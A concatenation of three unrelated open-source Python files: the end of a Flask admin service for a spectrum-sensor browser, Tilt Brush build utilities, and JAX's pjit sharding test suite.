traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return setScreenConfigWorker(sessionId)
@app.route("/admin/changePassword", methods=["POST"])
def changePassword():
"""
Change to a new password and email user.
URL Path:
URL Args (required):
- JSON structure of change password data
Returns:
200 OK if invocation OK.
500 if server not configured.
"""
@testcase
def changePasswordWorker():
try:
util.debugPrint("changePassword")
if not Config.isConfigured():
util.debugPrint("Please configure system")
abort(500)
urlPrefix = Config.getDefaultPath()
requestStr = request.data
accountData = json.loads(requestStr)
return jsonify(AccountsChangePassword.changePasswordEmailUser(
accountData, urlPrefix, sendEmail=False))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace("Unexpected error:" + str(sys.exc_info()[0]))
raise
return changePasswordWorker()
def purgeSensors():
"""
Run in an infinite loop purging all the sensors that are marked for purging.
This is invoked as a process from main.
"""
from Defines import PURGING
from Defines import RECOMPUTING
import time
while True:
for sensor in DbCollections.getSensors().find():
sensorObj = Sensor(sensor)
if sensorObj.getSensorStatus() == PURGING:
SensorDb.purgeSensor(sensorObj)
elif sensorObj.getSensorStatus() == RECOMPUTING:
RecomputeOccupancies.recomputeOccupanciesWorker(sensorObj.getSensorId())
time.sleep(30)
if __name__ == '__main__':
launchedFromMain = True
parser = argparse.ArgumentParser(description='Process command line args')
parser.add_argument("--pidfile", help="PID file", default=".admin.pid")
parser.add_argument("--logfile", help="LOG file", default="/tmp/admin.log")
parser.add_argument("--username",
help="USER name",
default="spectrumbrowser")
parser.add_argument("--groupname",
help="GROUP name",
default="spectrumbrowser")
parser.add_argument("--daemon", help="GROUP name", default="True")
args = parser.parse_args()
isDaemon = args.daemon == "True"
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(args.logfile)
logger.addHandler(fh)
timer = RepeatingTimer(3600, GarbageCollect.scanGeneratedDirs)
timer.start()
t = Process(target=purgeSensors)
t.start()
if isDaemon:
import daemon
import daemon.pidfile
context = daemon.DaemonContext()
context.stdin = sys.stdin
context.stderr = open(args.logfile, 'a')
context.stdout = open(args.logfile, 'a')
context.files_preserve = [fh.stream]
context.uid = pwd.getpwnam(args.username).pw_uid
context.gid = pwd.getpwnam(args.groupname).pw_gid
if os.path.exists(args.pidfile):
pid = open(args.pidfile).read()
try:
os.kill(int(pid), 0)
print "service is running -- not starting"
sys.exit(-1)
os._exit(-1)
except:
print "removing pidfile and starting"
os.remove(args.pidfile)
context.pidfile = daemon.pidfile.TimeoutPIDLockFile(args.pidfile)
with context:
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['CORS_HEADERS'] = 'Content-Type'
Log.loadGwtSymbolMap()
app.debug = True
util.debugPrint("Admin service -- starting")
if Config.isConfigured():
authentication.removeAdminSessions()
server = pywsgi.WSGIServer(('0.0.0.0', 8001),
app,
handler_class=WebSocketHandler)
else:
server = pywsgi.WSGIServer(('0.0.0.0', 8001), app)
server.serve_forever()
else:
# for debugging.
with util.pidfile(args.pidfile):
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['CORS_HEADERS'] = 'Content-Type'
Log.loadGwtSymbolMap()
app.debug = True
util.debugPrint("Admin service -- starting")
if Config.isConfigured():
authentication.removeAdminSessions()
server = pywsgi.WSGIServer(('0.0.0.0', 8001),
app,
handler_class=WebSocketHandler)
else:
server = pywsgi.WSGIServer(('0.0.0.0', 8001), app)
server.serve_forever()
|
utils.py | # Copyright 2020 The Tilt Brush Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Non Unity-specific utility functions and classes."""
import os
import contextlib
from unitybuild.constants import InternalError
@contextlib.contextmanager
def ensure_terminate(proc):
"""Ensure that *proc* is dead upon exiting the block."""
try:
yield
finally:
try:
# Windows raises WindowsError if the process is already dead.
if proc.poll() is None:
proc.terminate()
except Exception as e:
print("WARN: Could not kill process: %s" % (e,))
def destroy(file_or_dir):
"""Ensure that *file_or_dir* does not exist in the filesystem,
deleting it if necessary."""
import stat
if os.path.isfile(file_or_dir):
os.chmod(file_or_dir, stat.S_IWRITE)
os.unlink(file_or_dir)
elif os.path.isdir(file_or_dir):
import shutil, stat
for r,ds,fs in os.walk(file_or_dir, topdown=False):
for f in fs:
os.chmod(os.path.join(r, f), stat.S_IWRITE)
os.unlink(os.path.join(r, f))
for d in ds:
os.rmdir(os.path.join(r, d))
os.rmdir(file_or_dir)
if os.path.exists(file_or_dir):
raise InternalError("Temp build location '%s' is not empty" % file_or_dir)
def msys_control_c_workaround():
"""Turn off console Ctrl-c support and implement it ourselves."""
# Used to work around a bug in msys where control-c kills the process
# abruptly ~100ms after the process receives SIGINT. This prevents us
# from running cleanup handlers, like the one that kills the Unity.exe
# subprocess.
if not os.getenv('MSYSTEM'):
return
import ctypes
from ctypes.wintypes import HANDLE, DWORD, BOOL
kernel32 = ctypes.windll.kernel32
kernel32.GetStdHandle.restype = HANDLE
kernel32.GetStdHandle.argtypes = (DWORD,)
#kernel32.GetConsoleMode.restype = BOOL
kernel32.GetConsoleMode.argtypes = (HANDLE, ctypes.POINTER(DWORD))
#kernel32.SetConsoleMode.restype = BOOL
kernel32.SetConsoleMode.argtypes = (HANDLE, DWORD)
STD_INPUT_HANDLE = DWORD(-10)
ENABLE_PROCESSED_INPUT = DWORD(1)
stdin = kernel32.GetStdHandle(STD_INPUT_HANDLE)
mode = DWORD()
kernel32.GetConsoleMode(stdin, ctypes.byref(mode))
mode.value = mode.value & ~(ENABLE_PROCESSED_INPUT.value)
kernel32.SetConsoleMode(stdin, mode)
# interrupt_main won't interrupt WaitForSingleObject, so monkey-patch
import subprocess
def polling_wait(self):
from _subprocess import WaitForSingleObject, WAIT_OBJECT_0
while WaitForSingleObject(self._handle, 3000) != WAIT_OBJECT_0:
continue
return self.poll()
subprocess.Popen.wait = polling_wait
import _thread
import threading
def look_for_control_c():
import msvcrt, _thread
while msvcrt.getch() != '\x03':
continue
_thread.interrupt_main()
t = threading.Thread(target=look_for_control_c)
t.daemon = True
t.start()
def get_file_version(filename):
"""Raises LookupError if file has no version.
Returns (major, minor, micro)"""
import platform
if platform.system() == 'Windows':
import win32api
ffi = win32api.GetFileVersionInfo(filename, "\\")
# I don't know the difference between ProductVersion and FileVersion
def extract_16s(i32): return ((i32 >> 16) & 0xffff), i32 & 0xffff
file_version = extract_16s(ffi['FileVersionMS']) + extract_16s(ffi['FileVersionLS'])
return file_version[0:3]
else:
raise LookupError("Not supported yet on macOS")
# Untested -- get it from the property list
import json
from subprocess import check_output
plist_file = os.path.join(filename, 'Contents', 'Info.plist')
plist_json = check_output(['plutil', '-convert', 'json', '-o', '-', '-s', '--', plist_file])
plist = json.loads(plist_json)
# XXX: need to parse this out but I don't know the format
return plist['CFBundleShortVersionString']
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
global_data = np.arange(
prod(global_shape), dtype=np.float32).reshape(global_shape)
return global_device_array.GlobalDeviceArray.from_callback(
global_shape, global_mesh, mesh_axes, lambda idx: global_data[idx])
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 2)])
def testShardingConstraintPyTreeWithUnconstrainedDims(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(
x, [P(P.UNCONSTRAINED, 'y', None),
P('x', P.UNCONSTRAINED, None)])
x = x.copy()
x[0]['a'] *= 2
return x
shape = (2, 8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{'a': v, 'b': v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]['a'] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]['a'].device_buffers, 4)
compiler_ir = f.lower(x).compiler_ir(dialect="mhlo")
self.assertIn("unspecified_dims=[0]", compiler_ir)
self.assertIn("unspecified_dims=[1]", compiler_ir)
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# TODO(b/213927860): XLA incorrectly simplifies away the sharding constraint
# on the output.
if config.jax_enable_mlir:
raise unittest.SkipTest("test fails with jax_enable_mlir")
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithDuckTyping(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4,
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
f_low.donate_argnums == f_com.donate_argnums == (0,)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
out2 = f(out)
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
